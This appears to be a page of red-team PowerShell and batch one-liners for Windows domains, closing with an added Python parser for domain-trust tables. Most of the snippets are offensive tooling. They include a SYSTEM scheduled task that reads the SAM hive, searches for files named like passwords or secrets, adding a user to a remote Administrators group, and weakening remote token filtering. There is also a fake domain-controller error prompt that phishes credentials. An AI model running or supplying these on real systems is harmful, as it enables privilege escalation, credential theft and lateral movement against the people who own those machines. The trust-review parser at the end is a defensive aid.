```bat
schtasks /create /tn GetSid /tr "powershell.exe -c '$k=Get-Item HKLM:\security\sam\domains\account;$v=Get-ItemProperty $k.pspath;New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$v.V[-24..-1],0)|Format-List *|Out-File c:\sid.txt'" /sc minute /ru System /MO 1 & choice /C X /T 60 /D X > nul & schtasks /delete /tn GetSid /f
```
```powershell
# all files in sortable csv
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue | where {!$_.PSIsContainer} | select-object FullName, @{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}}, LastAccessTime, LastWriteTime, Length | export-csv -notypeinformation -path files.csv"

# grep for specific file types
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue -include @('*.doc*','*.xls*','*.pdf')|where{!$_.PSIsContainer}|select-object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,Length|export-csv -notypeinformation -path files.csv"

# grep for specific key words in file names
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue -include @('*password*','*sensitive*','*secret*')|where{!$_.PSIsContainer}|select-object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,Length|export-csv -notypeinformation -path files.csv"
```
```powershell
# Add a domain user to a remote server's local group, if your current user has admin over the remote machine
# (quoted like the other one-liners so the ADSI call is evaluated by the child process, not the calling shell)
powershell -c "([ADSI]'WinNT://SERVER/Administrators,group').add('WinNT://DOMAIN/USER,user')"

# Get all local groups on a remote server
powershell -c "([ADSI]'WinNT://SERVER,computer').psbase.children | where { $_.psbase.schemaClassName -eq 'group' } | foreach { ($_.name)[0]}"

# Find members of the local Administrators group on a remote server
powershell -c "$([ADSI]'WinNT://SERVER/Administrators,group').psbase.Invoke('Members') | foreach { $_.GetType().InvokeMember('ADspath', 'GetProperty', $null, $_, $null).Replace('WinNT://', '') }"

# Enable the local Administrator account on a remote server
```
```powershell
# Run winrm quickconfig with defaults
echo Y | winrm quickconfig

# Run Enable-PSRemoting with defaults
Enable-PSRemoting -force

# Adjust the local token filter policy (parameter dashes were typographic en-dashes, which PowerShell rejects; fixed to ASCII hyphens)
Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LocalAccountTokenFilterPolicy -Value 1 -Type DWord

# Enable Trusted Hosts for universal access
```
```bash
#!/bin/bash
sudo apt-get install git
cd /tmp/
git clone https://github.com/darkoperator/MSF-Installer.git
cd MSF-Installer
sudo ./msf_install.sh -i
source ~/.bashrc
sudo chmod 0666 /usr/local/share/metasploit-framework/log/production.log
```
```powershell
# Stolen/adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/
# POC from greg.foss[at]owasp.org
function prompt {
Add-Type -AssemblyName Microsoft.VisualBasic
[Microsoft.VisualBasic.Interaction]::MsgBox('Lost contact with the Domain Controller.', 'OKOnly,MsgBoxSetForeground,SystemModal,Critical', 'ERROR - 0xA801B720')
$c=[System.Security.Principal.WindowsIdentity]::GetCurrent().name
$credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName")
```
```powershell
# Write ~$megs MB of random-looking text to %TEMP%\data.dat (each outer iteration writes 4 x 256 KB = 1 MB).
# $w.Close() added so the buffered tail is flushed and the file handle is released.
$megs=1000;$w=New-Object IO.streamWriter $env:temp\data.dat;[char[]]$c='azertyuiopqsdfghjklmwxcvbnAZERTYUIOPQSDFGHJKLMWXCVBN0123456789-_';1..$megs|ForEach-Object{1..4|ForEach-Object{$r=$c|Get-Random -Count $c.Count;$s=-join $r;$w.Write($s*4kb);}};$w.Close();
```
```powershell
# user to SID
(New-Object System.Security.Principal.NTAccount("DOMAIN","USER")).Translate([System.Security.Principal.SecurityIdentifier]).Value

# SID to user
(New-Object System.Security.Principal.SecurityIdentifier("SID")).Translate([System.Security.Principal.NTAccount]).Value
```
SourceDomain | TargetDomain | TrustType | TrustDirection
---|---|---|---
finance.mothership.com | mothership.com | ParentChild | Bidirectional
mothership.com | corp.mothership.com | ParentChild | Bidirectional
mothership.com | finance.mothership.com | ParentChild | Bidirectional
mothership.com | engineering.mothership.com | ParentChild | Bidirectional
corp.mothership.com | mothership.com | ParentChild | Bidirectional
corp.mothership.com | subsidiary.com | External | Inbound
finance.mothership.com | mothership.com | ParentChild | Bidirectional
engineering.mothership.com | mothership.com | ParentChild | Bidirectional
subsidiary.com | product.subsidiary.com | ParentChild | Bidirectional
SourceDomain | TargetDomain | TrustType | TrustDirection
---|---|---|---
finance.mothership.com | mothership.com | ParentChild | Bidirectional
mothership.com | corp.mothership.com | ParentChild | Bidirectional
mothership.com | finance.mothership.com | ParentChild | Bidirectional
mothership.com | contracts.mothership.com | ParentChild | Bidirectional
corp.mothership.com | mothership.com | ParentChild | Bidirectional
contracts.mothership.com | mothership.com | ParentChild | Bidirectional
contracts.mothership.com | product.othercompany.com | External | Inbound
product.othercompany.com | contracts.mothership.com | External | Outbound
product.othercompany.com | othercompany.com | ParentChild | Bidirectional
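The two trust tables above are the kind of output a domain-trust enumeration produces. Reviewing such a listing by hand gets error-prone once a forest has more than a handful of domains, so here is an added example (not part of any gist on this page) that parses this pipe-delimited table format, separates the in-forest ParentChild trusts from External ones, and walks the trust edges to show which domains a given domain is transitively connected to. The sample table is constructed from the second listing above; the function and field names are this example's own.

```python
"""Parse a pipe-delimited domain-trust listing and summarise it for a trust review.

Added example; the table format follows the trust listings on this page, and the
sample data below is a constructed copy of the second table.
"""
from __future__ import annotations

from collections import deque
from dataclasses import dataclass

# Constructed sample: the second trust table from this page, verbatim.
SAMPLE_TRUST_TABLE = """\
SourceDomain | TargetDomain | TrustType | TrustDirection
---|---|---|---
finance.mothership.com | mothership.com | ParentChild | Bidirectional
mothership.com | corp.mothership.com | ParentChild | Bidirectional
mothership.com | finance.mothership.com | ParentChild | Bidirectional
mothership.com | contracts.mothership.com | ParentChild | Bidirectional
corp.mothership.com | mothership.com | ParentChild | Bidirectional
contracts.mothership.com | mothership.com | ParentChild | Bidirectional
contracts.mothership.com | product.othercompany.com | External | Inbound
product.othercompany.com | contracts.mothership.com | External | Outbound
product.othercompany.com | othercompany.com | ParentChild | Bidirectional
"""


@dataclass(frozen=True)
class Trust:
    source: str
    target: str
    trust_type: str
    direction: str


def _split_row(line: str) -> list[str]:
    """Split one table row on '|' and strip cell whitespace and edge pipes."""
    return [cell.strip() for cell in line.strip().strip("|").split("|")]


def parse_trust_table(text: str) -> list[Trust]:
    """Parse a header row, an optional ---|--- separator row, and data rows."""
    trusts: list[Trust] = []
    header: list[str] | None = None
    for raw in text.strip().splitlines():
        if not raw.strip():
            continue
        cells = _split_row(raw)
        if header is None:
            header = [c.lower() for c in cells]
            continue
        if all(set(c) <= set("-: ") for c in cells):
            continue  # markdown separator row
        row = dict(zip(header, cells))  # extra trailing cells are ignored
        trusts.append(Trust(row["sourcedomain"], row["targetdomain"],
                            row["trusttype"], row["trustdirection"]))
    return trusts


def external_trusts(trusts: list[Trust]) -> list[Trust]:
    """Trusts that cross the forest boundary: anything not ParentChild."""
    return [t for t in trusts if t.trust_type != "ParentChild"]


def reachable_domains(trusts: list[Trust], start: str) -> set[str]:
    """Breadth-first walk over source->target trust edges from `start`.

    Returns every domain connected to `start` by a chain of listed trusts,
    excluding `start` itself. Useful for seeing how far a single child domain
    is connected, which is what a trust review wants to minimise.
    """
    edges: dict[str, set[str]] = {}
    for t in trusts:
        edges.setdefault(t.source, set()).add(t.target)
    seen: set[str] = set()
    queue = deque([start])
    while queue:
        current = queue.popleft()
        for nxt in edges.get(current, ()):
            if nxt not in seen and nxt != start:
                seen.add(nxt)
                queue.append(nxt)
    return seen


if __name__ == "__main__":
    parsed = parse_trust_table(SAMPLE_TRUST_TABLE)
    print(f"{len(parsed)} trusts parsed")
    for t in external_trusts(parsed):
        print(f"EXTERNAL {t.direction:<13} {t.source} -> {t.target}")
    print("reachable from finance.mothership.com:",
          sorted(reachable_domains(parsed, "finance.mothership.com")))
```

Running it on the sample prints the two External rows (the contracts.mothership.com / product.othercompany.com pair, one Inbound and one Outbound) and shows that finance.mothership.com is transitively connected to every other domain in the listing, including othercompany.com, which is the sort of reach a trust review would want to justify or cut.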